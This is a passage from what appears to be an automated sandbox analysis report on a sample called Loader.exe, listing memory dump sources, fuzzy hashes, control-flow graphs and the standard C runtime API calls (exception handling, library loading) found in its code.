                                                                  • Associated: 00000005.00000002.1298391654.000000006D7EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1298417015.000000006D7F4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1298572293.000000006D848000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_6d7b0000_Loader.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: df2e2239c22222152f7c6715e0f176fae674b6dd6df2bb1c6bd00a0f66d40d13
                                                                  • Instruction ID: 38d7c02366947c684857a10f8956735e576907ad02a0e1a49befad1e0ac079d1
                                                                  • Opcode Fuzzy Hash: df2e2239c22222152f7c6715e0f176fae674b6dd6df2bb1c6bd00a0f66d40d13
                                                                  • Instruction Fuzzy Hash: E6519372E502268FDF05CEACC5A57EE7BF1EB4A324F109115E950E7390C2266949CB92
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1298274193.000000006D7B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D7B0000, based on PE: true
                                                                  • Associated: 00000005.00000002.1298252193.000000006D7B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1298391654.000000006D7EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1298417015.000000006D7F4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1298572293.000000006D848000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_6d7b0000_Loader.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 2b8dbe183dc45b96d92b058edd2d85d1732751ee8b8263ebd78ef15db331b42d
                                                                  • Instruction ID: 4f1b296d0cd981a7041c8481a7a3b107e047697381ee6617f17cf995bacf663b
                                                                  • Opcode Fuzzy Hash: 2b8dbe183dc45b96d92b058edd2d85d1732751ee8b8263ebd78ef15db331b42d
                                                                  • Instruction Fuzzy Hash: 6151ADB5E046098FCF45DF7CC6957EEBBF1BB4A360F114429D510AB341C63AA908CB92
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1298274193.000000006D7B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D7B0000, based on PE: true
                                                                  • Associated: 00000005.00000002.1298252193.000000006D7B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1298391654.000000006D7EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1298417015.000000006D7F4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1298572293.000000006D848000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_6d7b0000_Loader.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 5dc5c09f741359c7339d42dfd449f71b71e4e6be183b5d145d29bfac2c5375b4
                                                                  • Instruction ID: 2b0f1064200239ce5ccc7995a9030be12fe065f7b25e7845588aee9ba147be22
                                                                  • Opcode Fuzzy Hash: 5dc5c09f741359c7339d42dfd449f71b71e4e6be183b5d145d29bfac2c5375b4
                                                                  • Instruction Fuzzy Hash: 17412376A501054FDF04DEBCC5A53EEBBF59B07730F109219EA609B381C236A60ADB93
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1298274193.000000006D7B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D7B0000, based on PE: true
                                                                  • Associated: 00000005.00000002.1298252193.000000006D7B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1298391654.000000006D7EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1298417015.000000006D7F4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1298572293.000000006D848000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_6d7b0000_Loader.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: f4c66c8d0ceaca839772575bf71213b19f74d3f6c0f057b170bf8ddb5afb26fd
                                                                  • Instruction ID: 284a311ac703251c59990b94fc8e47f75cec7e274df35fb34d9664a74d79d04f
                                                                  • Opcode Fuzzy Hash: f4c66c8d0ceaca839772575bf71213b19f74d3f6c0f057b170bf8ddb5afb26fd
                                                                  • Instruction Fuzzy Hash: 65411275E112168FCF04CE6CC9947EFBBF1AB4A330F10965AD9259B3A0C2394906CB92
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1298274193.000000006D7B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D7B0000, based on PE: true
                                                                  • Associated: 00000005.00000002.1298252193.000000006D7B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1298391654.000000006D7EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1298417015.000000006D7F4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1298572293.000000006D848000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_6d7b0000_Loader.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: c5a167b78a31f59da8f1b28ce41b7272a2e12a8f2b9588dcbff1cc071da9d7ce
                                                                  • Instruction ID: 9543833c18020db8b838d78be2cd8b1364a0ffb3a2bb50807ad827da26ceceb5
                                                                  • Opcode Fuzzy Hash: c5a167b78a31f59da8f1b28ce41b7272a2e12a8f2b9588dcbff1cc071da9d7ce
                                                                  • Instruction Fuzzy Hash: C341D3B2E542058FCF04CEACC6946EE7BF1AB4E371F209229D921DB394D2364A45DB91
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1298274193.000000006D7B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D7B0000, based on PE: true
                                                                  • Associated: 00000005.00000002.1298252193.000000006D7B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1298391654.000000006D7EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1298417015.000000006D7F4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1298572293.000000006D848000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_6d7b0000_Loader.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: d42ba30de2bdfec67f5fab221bbd20f947f6a5dae564d36e2cf60a0c60937370
                                                                  • Instruction ID: 3d8f129bb82ff6a323335279ea6ba61211c391ea6d477d29b699ac4060e785e0
                                                                  • Opcode Fuzzy Hash: d42ba30de2bdfec67f5fab221bbd20f947f6a5dae564d36e2cf60a0c60937370
                                                                  • Instruction Fuzzy Hash: A2311531E401068FCF45CEBCC6993EF77F2A746370F219226C820AB295C22B59098B96

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 1595 6d7e1f59-6d7e1f84 call 6d7e2aa9 1598 6d7e1f8a-6d7e1f8d 1595->1598 1599 6d7e22f8-6d7e22fd call 6d7e3f90 1595->1599 1598->1599 1600 6d7e1f93-6d7e1f9c 1598->1600 1602 6d7e2099-6d7e209f 1600->1602 1603 6d7e1fa2-6d7e1fa6 1600->1603 1606 6d7e20a7-6d7e20b5 1602->1606 1603->1602 1605 6d7e1fac-6d7e1fb3 1603->1605 1607 6d7e1fcb-6d7e1fd0 1605->1607 1608 6d7e1fb5-6d7e1fbc 1605->1608 1609 6d7e20bb-6d7e20bf 1606->1609 1610 6d7e2261-6d7e2264 1606->1610 1607->1602 1612 6d7e1fd6-6d7e1fde call 6d7e1400 1607->1612 1608->1607 1611 6d7e1fbe-6d7e1fc5 1608->1611 1609->1610 1615 6d7e20c5-6d7e20cc 1609->1615 1613 6d7e2266-6d7e2269 1610->1613 1614 6d7e2287-6d7e2290 call 6d7e1400 1610->1614 1611->1602 1611->1607 1627 6d7e2292-6d7e2296 1612->1627 1631 6d7e1fe4-6d7e1ffd call 6d7e1400 * 2 1612->1631 1613->1599 1618 6d7e226f-6d7e2284 call 6d7e22fe 1613->1618 1614->1599 1614->1627 1619 6d7e20ce-6d7e20d5 1615->1619 1620 6d7e20e4-6d7e20ea 1615->1620 1618->1614 1619->1620 1626 6d7e20d7-6d7e20de 1619->1626 1622 6d7e20f0-6d7e2117 call 6d7e1953 1620->1622 1623 6d7e2201-6d7e2205 1620->1623 1622->1623 1638 6d7e211d-6d7e2120 1622->1638 1629 6d7e2207-6d7e2210 call 6d7e11ae 1623->1629 1630 6d7e2211-6d7e221d 1623->1630 1626->1610 1626->1620 1629->1630 1630->1614 1635 6d7e221f-6d7e2229 1630->1635 1631->1599 1653 6d7e2003-6d7e2009 1631->1653 1640 6d7e222b-6d7e222d 1635->1640 1641 6d7e2237-6d7e2239 1635->1641 1645 6d7e2123-6d7e2138 1638->1645 1640->1614 1646 6d7e222f-6d7e2233 1640->1646 1643 6d7e223b-6d7e224e call 6d7e1400 * 2 1641->1643 1644 6d7e2250-6d7e225d call 6d7e2977 1641->1644 1671 6d7e2297 call 6d7e3efa 1643->1671 1662 6d7e225f 1644->1662 1663 6d7e22bc-6d7e22d1 call 6d7e1400 * 2 1644->1663 1649 6d7e213e-6d7e2141 1645->1649 1650 6d7e21e2-6d7e21f5 1645->1650 1646->1614 1652 6d7e2235 1646->1652 1649->1650 1656 6d7e2147-6d7e214f 1649->1656 1650->1645 1655 6d7e21fb-6d7e21fe 1650->1655 1652->1643 1658 6d7e200b-6d7e200f 1653->1658 1659 6d7e2035-6d7e203d call 6d7e1400 1653->1659 1655->1623 1656->1650 1661 6d7e2155-6d7e2169 1656->1661 1658->1659 1664 6d7e2011-6d7e2018 1658->1664 1680 6d7e203f-6d7e205f call 6d7e1400 * 2 call 6d7e2977 1659->1680 1681 6d7e20a1-6d7e20a4 1659->1681 1666 6d7e216c-6d7e217d 1661->1666 1662->1614 1688 6d7e22d6-6d7e22f3 call 6d7e1b3f call 6d7e2877 call 6d7e2a34 call 6d7e27ee 1663->1688 1689 6d7e22d3 1663->1689 1669 6d7e202c-6d7e202f 1664->1669 1670 6d7e201a-6d7e2021 1664->1670 1672 6d7e217f-6d7e2190 call 6d7e2434 1666->1672 1673 6d7e21a3-6d7e21b0 1666->1673 1669->1599 1669->1659 1670->1669 1678 6d7e2023-6d7e202a 1670->1678 1684 6d7e229c-6d7e22b7 call 6d7e11ae call 6d7e25e8 call 6d7df844 1671->1684 1691 6d7e21b4-6d7e21dc call 6d7e1ed9 1672->1691 1692 6d7e2192-6d7e219b 1672->1692 1673->1666 1676 6d7e21b2 1673->1676 1683 6d7e21df 1676->1683 1678->1659 1678->1669 1680->1681 1709 6d7e2061-6d7e2066 1680->1709 1681->1606 1683->1650 1684->1663 1688->1599 1689->1688 1691->1683 1692->1672 1697 6d7e219d-6d7e21a0 1692->1697 1697->1673 1709->1671 1711 6d7e206c-6d7e207f call 6d7e2600 1709->1711 1711->1684 1716 6d7e2085-6d7e2091 1711->1716 1716->1671 1717 6d7e2097 1716->1717 1717->1711
                                                                  APIs
                                                                  • type_info::operator==.LIBVCRUNTIME ref: 6D7E2078
                                                                  • ___TypeMatch.LIBVCRUNTIME ref: 6D7E2186
                                                                  • CatchIt.LIBVCRUNTIME ref: 6D7E21D7
                                                                  • _UnwindNestedFrames.LIBCMT ref: 6D7E22D8
                                                                  • CallUnexpected.LIBVCRUNTIME ref: 6D7E22F3
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1298274193.000000006D7B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D7B0000, based on PE: true
                                                                  • Associated: 00000005.00000002.1298252193.000000006D7B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1298391654.000000006D7EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1298417015.000000006D7F4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1298572293.000000006D848000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_6d7b0000_Loader.jbxd
                                                                  Similarity
                                                                  • API ID: CallCatchFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                                  • String ID: csm$csm$csm
                                                                  • API String ID: 4119006552-393685449
                                                                  • Opcode ID: 44a95ff40a7d05c4b85fcf858177592f2b801f74f4b1b4efec31dcb82bfa087d
                                                                  • Instruction ID: c5ecb959c1a1782fad6fa538b69506ddd9fa5376b731825c1c473659cbaf5357
                                                                  • Opcode Fuzzy Hash: 44a95ff40a7d05c4b85fcf858177592f2b801f74f4b1b4efec31dcb82bfa087d
                                                                  • Instruction Fuzzy Hash: DFB1A07180420BEFCF25CFA4CA449AEB7B9FF053A8F52416AE9116B215C731DA51CB93

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 1718 6d7e1050-6d7e10a1 call 6d7eb9b0 call 6d7e1010 call 6d7e16c7 1725 6d7e10fd-6d7e1100 1718->1725 1726 6d7e10a3-6d7e10b5 1718->1726 1727 6d7e1102-6d7e110f call 6d7e16b0 1725->1727 1728 6d7e1120-6d7e1129 1725->1728 1726->1728 1729 6d7e10b7-6d7e10ce 1726->1729 1733 6d7e1114-6d7e111d call 6d7e1010 1727->1733 1731 6d7e10e4 1729->1731 1732 6d7e10d0-6d7e10de call 6d7e1650 1729->1732 1735 6d7e10e7-6d7e10ec 1731->1735 1741 6d7e10f4-6d7e10fb 1732->1741 1742 6d7e10e0 1732->1742 1733->1728 1735->1729 1738 6d7e10ee-6d7e10f0 1735->1738 1738->1728 1739 6d7e10f2 1738->1739 1739->1733 1741->1733 1743 6d7e112a-6d7e1133 1742->1743 1744 6d7e10e2 1742->1744 1745 6d7e116d-6d7e117d call 6d7e1690 1743->1745 1746 6d7e1135-6d7e113c 1743->1746 1744->1735 1751 6d7e117f-6d7e118e call 6d7e16b0 1745->1751 1752 6d7e1191-6d7e11ad call 6d7e1010 call 6d7e1670 1745->1752 1746->1745 1748 6d7e113e-6d7e114d call 6d7eb7d0 1746->1748 1756 6d7e114f-6d7e1167 1748->1756 1757 6d7e116a 1748->1757 1751->1752 1756->1757 1757->1745
                                                                  APIs
                                                                  • _ValidateLocalCookies.LIBCMT ref: 6D7E1087
                                                                  • ___except_validate_context_record.LIBVCRUNTIME ref: 6D7E108F
                                                                  • _ValidateLocalCookies.LIBCMT ref: 6D7E1118
                                                                  • __IsNonwritableInCurrentImage.LIBCMT ref: 6D7E1143
                                                                  • _ValidateLocalCookies.LIBCMT ref: 6D7E1198
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1298274193.000000006D7B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D7B0000, based on PE: true
                                                                  • Associated: 00000005.00000002.1298252193.000000006D7B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1298391654.000000006D7EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1298417015.000000006D7F4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1298572293.000000006D848000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_6d7b0000_Loader.jbxd
                                                                  Similarity
                                                                  • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                  • String ID: csm
                                                                  • API String ID: 1170836740-1018135373
                                                                  • Opcode ID: e3c4f6e9735690a508b5589524b8791edf7be0df1e4c58af54ba24bb94525912
                                                                  • Instruction ID: 460225772bcedc0941d966ed19364984c6718d7abc12c87c35d60532999eb253
                                                                  • Opcode Fuzzy Hash: e3c4f6e9735690a508b5589524b8791edf7be0df1e4c58af54ba24bb94525912
                                                                  • Instruction Fuzzy Hash: 35419534A042499FCF00CF68C985AAEBBB5BF463B8F15C166ED149B351D731DA11CB92

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 1764 6d7e52ca-6d7e52d5 1765 6d7e52e6-6d7e52ec 1764->1765 1766 6d7e52d7-6d7e52e1 call 6d7e53b3 1764->1766 1768 6d7e52ee-6d7e52f4 1765->1768 1769 6d7e5313-6d7e5328 call 6d7e5e98 1765->1769 1774 6d7e5389-6d7e538b 1766->1774 1771 6d7e52f6-6d7e5301 call 6d7e538c 1768->1771 1772 6d7e5307-6d7e5311 1768->1772 1779 6d7e532a-6d7e533e GetLastError call 6d7e4916 call 6d7e4970 1769->1779 1780 6d7e5340-6d7e5347 1769->1780 1771->1772 1776 6d7e5388 1771->1776 1772->1776 1776->1774 1779->1776 1781 6d7e5349-6d7e5353 call 6d7e538c 1780->1781 1782 6d7e5355-6d7e5369 call 6d7e5121 1780->1782 1781->1782 1791 6d7e5387 1781->1791 1792 6d7e536b-6d7e537f GetLastError call 6d7e4916 call 6d7e4970 1782->1792 1793 6d7e5381-6d7e5385 1782->1793 1791->1776 1792->1791 1793->1791
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1298274193.000000006D7B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D7B0000, based on PE: true
                                                                  • Associated: 00000005.00000002.1298252193.000000006D7B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1298391654.000000006D7EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1298417015.000000006D7F4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1298572293.000000006D848000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_6d7b0000_Loader.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: C:\Users\user\Desktop\Loader.exe$ST~m
                                                                  • API String ID: 0-2741542857
                                                                  • Opcode ID: 372c30e1c9c035fea2d45b3063779c56a6a3b86a7f9d077ccc43606ed7866481
                                                                  • Instruction ID: 1c30247c81c11bf365c460e0670d7d2685e8e5f514eb37b41e451825fb52e3aa
                                                                  • Opcode Fuzzy Hash: 372c30e1c9c035fea2d45b3063779c56a6a3b86a7f9d077ccc43606ed7866481
                                                                  • Instruction Fuzzy Hash: EA21927160820EAFC7159F65AE4497AB7B9BF053FC7054925EA14DB291D770EC008BA2

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 1798 6d7e6096-6d7e60a2 1799 6d7e6134-6d7e6137 1798->1799 1800 6d7e613d 1799->1800 1801 6d7e60a7-6d7e60b8 1799->1801 1802 6d7e613f-6d7e6143 1800->1802 1803 6d7e60ba-6d7e60bd 1801->1803 1804 6d7e60c5-6d7e60de LoadLibraryExW 1801->1804 1805 6d7e615d-6d7e615f 1803->1805 1806 6d7e60c3 1803->1806 1807 6d7e6144-6d7e6154 1804->1807 1808 6d7e60e0-6d7e60e9 GetLastError 1804->1808 1805->1802 1812 6d7e6131 1806->1812 1807->1805 1811 6d7e6156-6d7e6157 FreeLibrary 1807->1811 1809 6d7e60eb-6d7e60fd call 6d7e40b8 1808->1809 1810 6d7e6122-6d7e612f 1808->1810 1809->1810 1815 6d7e60ff-6d7e6111 call 6d7e40b8 1809->1815 1810->1812 1811->1805 1812->1799 1815->1810 1818 6d7e6113-6d7e6120 LoadLibraryExW 1815->1818 1818->1807 1818->1810
                                                                  APIs
                                                                  • FreeLibrary.KERNEL32(00000000,?,6D7E61A5,00000000,6D7E3BB2,00000000,00000000,00000001,?,6D7E631E,00000022,FlsSetValue,6D7EEA40,6D7EEA48,00000000), ref: 6D7E6157
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1298274193.000000006D7B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D7B0000, based on PE: true
                                                                  • Associated: 00000005.00000002.1298252193.000000006D7B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1298391654.000000006D7EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1298417015.000000006D7F4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1298572293.000000006D848000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_6d7b0000_Loader.jbxd
                                                                  Similarity
                                                                  • API ID: FreeLibrary
                                                                  • String ID: api-ms-$ext-ms-
                                                                  • API String ID: 3664257935-537541572
                                                                  • Opcode ID: 37024fd2e3635ab031c4bd7d6c2a6a89b7eabc9ecaf6aeefd5de5e21e28b6dcb
                                                                  • Instruction ID: 1e31fd9842005c2c00f636ef06e8b75b9e73f48a34c9a1db4689ab81ed101554
                                                                  • Opcode Fuzzy Hash: 37024fd2e3635ab031c4bd7d6c2a6a89b7eabc9ecaf6aeefd5de5e21e28b6dcb
                                                                  • Instruction Fuzzy Hash: 0821A136A41212ABDB129B249D44B5E7B79AB463F4F520931EA15E7281D730EA04C6D3
                                                                  APIs
                                                                  • GetLastError.KERNEL32(00000001,?,6D7E0FD4,6D7DE422,6D7DE719,?,6D7DE951,?,00000001,?,?,00000001,?,6D7F24B8,0000000C,6D7DEA4A), ref: 6D7E141C
                                                                  • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6D7E142A
                                                                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6D7E1443
                                                                  • SetLastError.KERNEL32(00000000,6D7DE951,?,00000001,?,?,00000001,?,6D7F24B8,0000000C,6D7DEA4A,?,00000001,?), ref: 6D7E1495
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1298274193.000000006D7B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D7B0000, based on PE: true
                                                                  • Associated: 00000005.00000002.1298252193.000000006D7B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1298391654.000000006D7EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1298417015.000000006D7F4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1298572293.000000006D848000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_6d7b0000_Loader.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLastValue___vcrt_
                                                                  • String ID:
                                                                  • API String ID: 3852720340-0
                                                                  • Opcode ID: 9d037c28278b79618a802c57b2c8f3293a405da6678af16f1e2e333456d6ffc0
                                                                  • Instruction ID: 418475c3f0b20d3b63673b8eb96349b7ce71c6069002ba9e968f994a6a2a921c
                                                                  • Opcode Fuzzy Hash: 9d037c28278b79618a802c57b2c8f3293a405da6678af16f1e2e333456d6ffc0
                                                                  • Instruction Fuzzy Hash: A901883220D3265DAB151BB96E4FBA62B74EB076F9721033AFE28552D4EF114841D2D3
                                                                  APIs
                                                                  • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,5073EDC3,00000000,?,00000000,6D7EBA62,000000FF,?,6D7E32FE,?,?,6D7E32D2,?), ref: 6D7E3399
                                                                  • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6D7E33AB
                                                                  • FreeLibrary.KERNEL32(00000000,?,00000000,6D7EBA62,000000FF,?,6D7E32FE,?,?,6D7E32D2,?), ref: 6D7E33CD
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1298274193.000000006D7B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D7B0000, based on PE: true
                                                                  • Associated: 00000005.00000002.1298252193.000000006D7B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1298391654.000000006D7EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1298417015.000000006D7F4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1298572293.000000006D848000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_6d7b0000_Loader.jbxd
                                                                  Similarity
                                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                                  • String ID: CorExitProcess$mscoree.dll
                                                                  • API String ID: 4061214504-1276376045
                                                                  • Opcode ID: 057ce24f0f5169abceaf867a663f218c80af472811312b12aa9e55e88360fc87
                                                                  • Instruction ID: 44155cbfe77e0246755f15ed91545e7b6fbe7dbedb7c2cdd1ff8c902889fb526
                                                                  • Opcode Fuzzy Hash: 057ce24f0f5169abceaf867a663f218c80af472811312b12aa9e55e88360fc87
                                                                  • Instruction Fuzzy Hash: 69016276900655EFDF029B50CD05FBEFBB8FB45766F004636E821A22A0DB749900CA91
                                                                  APIs
                                                                  • EncodePointer.KERNEL32(00000000,?), ref: 6D7E2323
                                                                  • CatchIt.LIBVCRUNTIME ref: 6D7E2409
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1298274193.000000006D7B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D7B0000, based on PE: true
                                                                  • Associated: 00000005.00000002.1298252193.000000006D7B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1298391654.000000006D7EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1298417015.000000006D7F4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1298572293.000000006D848000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_6d7b0000_Loader.jbxd
                                                                  Similarity
                                                                  • API ID: CatchEncodePointer
                                                                  • String ID: MOC$RCC
                                                                  • API String ID: 1435073870-2084237596
                                                                  • Opcode ID: 6bd249845affe9813d299dbe4a01777ff52b0f6ba3d965aa0e1329c5b1d36b95
                                                                  • Instruction ID: 66de248320a1bd6e21768b2bf5902085edd77100836486aad46ae1eb336af3d2
                                                                  • Opcode Fuzzy Hash: 6bd249845affe9813d299dbe4a01777ff52b0f6ba3d965aa0e1329c5b1d36b95
                                                                  • Instruction Fuzzy Hash: 7A418B3290020EAFCF16CF94CE81AEE7BB5BF09364F15816AFA0467211D3319950DF52
                                                                  APIs
                                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,6D7E1748,00000000,?,00000001,?,?,?,6D7E1837,00000001,FlsFree,6D7EDC78,FlsFree), ref: 6D7E17A4
                                                                  • GetLastError.KERNEL32(?,6D7E1748,00000000,?,00000001,?,?,?,6D7E1837,00000001,FlsFree,6D7EDC78,FlsFree,00000000,?,6D7E14E3), ref: 6D7E17AE
                                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 6D7E17D6
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1298274193.000000006D7B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D7B0000, based on PE: true
                                                                  • Associated: 00000005.00000002.1298252193.000000006D7B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1298391654.000000006D7EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1298417015.000000006D7F4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1298572293.000000006D848000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_6d7b0000_Loader.jbxd
                                                                  Similarity
                                                                  • API ID: LibraryLoad$ErrorLast
                                                                  • String ID: api-ms-
                                                                  • API String ID: 3177248105-2084034818
                                                                  • Opcode ID: b017a860552c3f494fd5077b7110b5956348897f4b4f9f5485ac6772489a978f
                                                                  • Instruction ID: 2be3f6469fb92e01997d42f6b1fe2266cf5bd65f8e26206d6dd40e9cf517742b
                                                                  • Opcode Fuzzy Hash: b017a860552c3f494fd5077b7110b5956348897f4b4f9f5485ac6772489a978f
                                                                  • Instruction Fuzzy Hash: 12E04F3078420DBBEF011B61DE06B283F75AB01BE9F508431FE0DE84E0DB61D6109587
                                                                  APIs
                                                                  • GetConsoleOutputCP.KERNEL32(5073EDC3,00000000,00000000,?), ref: 6D7E8604
                                                                    • Part of subcall function 6D7E5E98: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,6D7E803F,?,00000000,-00000008), ref: 6D7E5EF9
